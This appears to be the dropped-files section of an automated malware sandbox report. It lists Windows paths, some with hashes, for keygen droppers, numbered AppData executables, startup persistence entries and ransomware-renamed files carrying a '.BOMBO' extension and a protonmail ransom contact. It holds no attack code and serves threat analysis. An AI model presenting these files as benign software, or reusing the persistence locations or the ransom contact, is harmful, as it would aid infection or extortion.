  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_1E9C69B81893CED35518318987DF02B9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_5AEAB4580B46F694CB8F283487E371AF

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BCB67D7ECB470284AF35679F339E879F

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BF8ADE46DBC25E68B25D8AFE7ED35F0A

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_7BF093847A14BC288AAB1EC3BF52B032

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_EF36D7CDFE850F385174ACDA8E139588

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC4FEA46495CA161D470CD085EDBAADE

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC4FEA46495CA161D470CD085EDBAADE

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDB0B468D23C74904993FA6E9CDC1988

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E49827401028F7A0F97B5576C77A26CB_7CE95D8DCA26FE957E7BD7D76F353B08

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F9033F847D80A1FBFF5B3A52527FD97F

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6B1DA300-2A8C-11EB-AE0F-E67B5CAEC115}.dat

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\w5ukms8\imagestore.dat

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D73194RS\json[1].json

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O1R1CL99\ip[1].htm

  • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe

  • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe

  • C:\Users\Admin\AppData\Local\Temp\0B44010BDDEFEFD3.exe

  • C:\Users\Admin\AppData\Local\Temp\1021C014A4C9A552.exe

  • C:\Users\Admin\AppData\Local\Temp\3F.tmp\40.tmp\41.bat

  • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

  • C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

  • C:\Users\Admin\AppData\Local\Temp\MSI976F.tmp

  • C:\Users\Admin\AppData\Local\Temp\MSIA380.tmp

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX10\JOzWR.dat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\JOzWR.dat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\intro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\intro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX1\potato.dat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\FFF.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\John_Ship.url

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall21.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\config.ini

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\pegs.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\ubisoftpro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\intro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\intro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\user32.dll

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\002.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\BTRSetp.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\John_Ship.url

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\ZZZ.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall21.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\config.ini

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\hjjgaa.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\jg2_2qua.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\pegs.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX4\ubisoftpro.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\JOzWR.dat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\JOzWR.dat.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX5\potato.dat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-pr.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-3.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen-step-4.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX6\keygen.bat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX7\JOzWR.dat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX7\JOzWR.dat.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX7\key.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX7\potato.dat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\BTRSetp.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\DreamTrips.bat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\id6.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe

    MD5

    4daaeeeba9222078c92a61b2dabbe1d3

    SHA1

    0efc3cf265a697995a318eb2ac1ea2854af4d4cd

    SHA256

    a3d1bbbae88dc886822c41503e47fb2d475160d81f99ab6621d60cfa59b3effd

    SHA512

    2f8b73a414f96a36b54ed703054fb2a43ea2799d21076a2be75b8c5e7b49245d9a836a9dc1b5413f08366927a4839d158aa8f2c8b3b7589b5f0639b5a807dde4

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\juppp.exe

    MD5

    4daaeeeba9222078c92a61b2dabbe1d3

    SHA1

    0efc3cf265a697995a318eb2ac1ea2854af4d4cd

    SHA256

    a3d1bbbae88dc886822c41503e47fb2d475160d81f99ab6621d60cfa59b3effd

    SHA512

    2f8b73a414f96a36b54ed703054fb2a43ea2799d21076a2be75b8c5e7b49245d9a836a9dc1b5413f08366927a4839d158aa8f2c8b3b7589b5f0639b5a807dde4

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\lcx.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\lunch.bat

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\setup_full.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\version2.txt

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX8\wyfdggaa.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe

  • C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe

  • C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

  • C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

  • C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

  • C:\Users\Admin\AppData\Local\Temp\download\ATL71.DLL

  • C:\Users\Admin\AppData\Local\Temp\download\MSVCP71.dll

  • C:\Users\Admin\AppData\Local\Temp\download\MSVCR71.dll

  • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe

  • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe

  • C:\Users\Admin\AppData\Local\Temp\download\dl_peer_id.dll

  • C:\Users\Admin\AppData\Local\Temp\download\download_engine.dll

  • C:\Users\Admin\AppData\Local\Temp\download\zlib1.dll

  • C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

  • C:\Users\Admin\AppData\Local\Temp\gdiview.msi

    MD5

    7cc103f6fd70c6f3a2d2b9fca0438182

    SHA1

    699bd8924a27516b405ea9a686604b53b4e23372

    SHA256

    dbd9f2128f0b92b21ef99a1d7a0f93f14ebe475dba436d8b1562677821b918a1

    SHA512

    92ec9590e32a0cf810fc5d15ca9d855c86e5b8cb17cf45dd68bcb972bd78692436535adf9f510259d604e0a8ba2e25c6d2616df242261eb7b09a0ca5c6c2c128

  • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

    MD5

    4d4c98eca32b14aeb074db34cd0881e4

    SHA1

    92f213d609bba05d41d6941652a88c44936663a4

    SHA256

    4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

    SHA512

    959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

  • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

    MD5

    4d4c98eca32b14aeb074db34cd0881e4

    SHA1

    92f213d609bba05d41d6941652a88c44936663a4

    SHA256

    4182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f

    SHA512

    959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf

  • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

    MD5

    b05f05fc749504842cc0eec7dab67221

    SHA1

    402507d5310ba3904b60f0cc5630140cf228e25f

    SHA256

    26531c95f40a09c5581ea3ff77851d3d74ecdf1ec90559429bde02915bc6e9ed

    SHA512

    3cd2f6870978bb9512dde3e2daafc9b7f869b6361e90f14d27e4a5b3cfcf455a0a7261c25ee3aba638b96d059253a0c87b031f23ad041a5cd978b2aac03d010a

  • C:\Users\Admin\AppData\Local\Temp\nsi5DB.tmp\Sibuia.dll

  • C:\Users\Admin\AppData\Local\Temp\nst7A0.tmp\Sibuia.dll

  • C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe

  • C:\Users\Admin\AppData\Local\Temp\sib1019.tmp\0\setup.exe

  • C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe

  • C:\Users\Admin\AppData\Local\Temp\sibA11.tmp\0\setup.exe

  • C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe

  • C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe

  • C:\Users\Admin\AppData\Local\Temp\tmp1555.tmp

  • C:\Users\Admin\AppData\Local\Temp\tmp25B9.tmp

  • C:\Users\Admin\AppData\Local\Temp\tmp4FE5.tmp

  • C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp

  • C:\Users\Admin\AppData\Roaming\-L3O44A9\-L3logim.jpeg

  • C:\Users\Admin\AppData\Roaming\-L3O44A9\-L3logri.ini

  • C:\Users\Admin\AppData\Roaming\-L3O44A9\-L3logrv.ini

  • C:\Users\Admin\AppData\Roaming\1.jar

  • C:\Users\Admin\AppData\Roaming\10.exe

  • C:\Users\Admin\AppData\Roaming\11.exe

  • C:\Users\Admin\AppData\Roaming\12.exe

  • C:\Users\Admin\AppData\Roaming\13.exe

  • C:\Users\Admin\AppData\Roaming\14.exe

  • C:\Users\Admin\AppData\Roaming\15.exe

  • C:\Users\Admin\AppData\Roaming\16.exe

  • C:\Users\Admin\AppData\Roaming\17.exe

  • C:\Users\Admin\AppData\Roaming\18.exe

  • C:\Users\Admin\AppData\Roaming\19.exe

  • C:\Users\Admin\AppData\Roaming\2.exe

  • C:\Users\Admin\AppData\Roaming\20.exe

  • C:\Users\Admin\AppData\Roaming\21.exe

  • C:\Users\Admin\AppData\Roaming\22.exe

  • C:\Users\Admin\AppData\Roaming\23.exe

  • C:\Users\Admin\AppData\Roaming\24.exe

  • C:\Users\Admin\AppData\Roaming\25.exe

  • C:\Users\Admin\AppData\Roaming\26.exe

  • C:\Users\Admin\AppData\Roaming\27.exe

    MD5

    3d2c6861b6d0899004f8abe7362f45b7

    SHA1

    33855b9a9a52f9183788b169cc5d57e6ad9da994

    SHA256

    dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064

    SHA512

    19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

  • C:\Users\Admin\AppData\Roaming\28.exe

  • C:\Users\Admin\AppData\Roaming\29.dll

    MD5

    647d2e78c8b882a4d308fc6e89812b0b

    SHA1

    b5cdc337cb41667409269a56c3092e1bd1917974

    SHA256

    da584a6b77aa53c232193a4757975aac5d5121bdc5266096e746432c453502c3

    SHA512

    a01641aba2c2a02932c18e25dafb8058a1d9e11cd4f25d17a06731e39c7738614b833b856e7fc26ad0100212772d57dbccfd5a6297b6cb21fa4dec48f1aff1bb

  • C:\Users\Admin\AppData\Roaming\29.exe

  • C:\Users\Admin\AppData\Roaming\3.exe

  • C:\Users\Admin\AppData\Roaming\30.exe

  • C:\Users\Admin\AppData\Roaming\31.exe

  • C:\Users\Admin\AppData\Roaming\4.dll

    MD5

    647d2e78c8b882a4d308fc6e89812b0b

    SHA1

    b5cdc337cb41667409269a56c3092e1bd1917974

    SHA256

    da584a6b77aa53c232193a4757975aac5d5121bdc5266096e746432c453502c3

    SHA512

    a01641aba2c2a02932c18e25dafb8058a1d9e11cd4f25d17a06731e39c7738614b833b856e7fc26ad0100212772d57dbccfd5a6297b6cb21fa4dec48f1aff1bb

  • C:\Users\Admin\AppData\Roaming\4.exe

  • C:\Users\Admin\AppData\Roaming\5.exe

  • C:\Users\Admin\AppData\Roaming\6.exe

    MD5

    cf04c482d91c7174616fb8e83288065a

    SHA1

    6444eb10ec9092826d712c1efad73e74c2adae14

    SHA256

    7b01d36ac9a77abfa6a0ddbf27d630effae555aac9ae75b051c6eedaf18d1dcf

    SHA512

    3eca1e17e698c427bc916465526f61caee356d7586836b022f573c33a6533ce4b4b0f3fbd05cc2b7b44568e814121854fdf82480757f02d925e293f7d92a2af6

  • C:\Users\Admin\AppData\Roaming\7.exe

  • C:\Users\Admin\AppData\Roaming\8.exe

    MD5

    dea5598aaf3e9dcc3073ba73d972ab17

    SHA1

    51da8356e81c5acff3c876dffbf52195fe87d97f

    SHA256

    8ec9516ac0a765c28adfe04c132619170e986df07b1ea541426be124fb7cfd2c

    SHA512

    a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

  • C:\Users\Admin\AppData\Roaming\9.exe

  • C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logim.jpeg

  • C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logri.ini

  • C:\Users\Admin\AppData\Roaming\J-96T9R9\J-9logrv.ini

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3825035466-2522850611-591511364-1000\83aa4cc77f591dfc2374580bbd95f6ba_fc0e0041-a258-4d5d-ad46-ed56e156a8eb

  • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.dat

  • C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe

    MD5

    3d2c6861b6d0899004f8abe7362f45b7

    SHA1

    33855b9a9a52f9183788b169cc5d57e6ad9da994

    SHA256

    dbe95b94656eb0173998737fb5e733d3714c8e3b58226a1a038ca85257c8b064

    SHA512

    19b28a05d6e0d6026fb47a20e2ff43bfdf32387ee823053dcd4878123b20730c0ea65d01ff25080c484f67eeedb2caa45b4b5eb01a3a3bb2d3bc5246cc73aa6e

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\0797UHZL.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\1Z2ZRHPR.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\1Z2ZRHPR.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AP0OAKS1.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AY7XHPRG.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FFPXUHEB.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FMSTB1L3.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HHBIO06U.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HYK21CF8.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\HYK21CF8.txt.id-ABF639FB.[Bit_decrypt@protonmail.com].BOMBO

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\JN6U4BA2.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\KDHX9VDQ.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\MQT01GO1.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PY7KO6H5.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\S2PCY1I3.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UX33Q2FV.txt

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupCMD28.lnk

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta

    MD5

    245233164af05a3081bb7a1647e6c153

    SHA1

    a127cf8c295993bd99bdf72435242eb879dcaa6e

    SHA256

    948128249c81f1427d0af85bd2bbf9e788ea6aa2f347a84c2787b63acb421205

    SHA512

    604f617c0f477a1743ed9ee759b766628b3f4793ad28920056026b44df872401753f99897907d34591779992b29f1773ecbeb46512930b1402964d72dc4950c8

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PickerHost.url

  • C:\Users\Admin\AppData\Roaming\O5N16ST5\O5Nlogim.jpeg

  • C:\Users\Admin\AppData\Roaming\O5N16ST5\O5Nlogri.ini

  • C:\Users\Admin\AppData\Roaming\O5N16ST5\O5Nlogrv.ini

  • C:\Users\Admin\AppData\Roaming\feeed.exe

    MD5

    dea5598aaf3e9dcc3073ba73d972ab17

    SHA1

    51da8356e81c5acff3c876dffbf52195fe87d97f

    SHA256

    8ec9516ac0a765c28adfe04c132619170e986df07b1ea541426be124fb7cfd2c

    SHA512

    a6c674ba3d510120a1d163be7e7638f616eedb15af5653b0952e63b7fd4c2672fafc9638ab7795e76b7f07d995196437d6c35e5b8814e9ad866ea903f620e81e

  • C:\Users\Admin\Desktop\08751be484e1572995ebb085df1c2c6372084d63a64dce7fab28130d79a6ea2d.exe

  • C:\Users\Admin\Desktop\0a9f79abd48b95544d7e2b6658637d1eb23067a94e10bf06d05c9ecc73cf4b51.exe

  • C:\Users\Admin\Desktop\0di3x.exe

  • C:\Users\Admin\Desktop\201106-9sxjh7tvxj_pw_infected.zip

  • C:\Users\Admin\Desktop\2019-09-02_22-41-10.exe

  • C:\Users\Admin\Desktop\2c01b007729230c415420ad641ad92eb.exe

  • C:\Users\Admin\Desktop\31.exe

  • C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe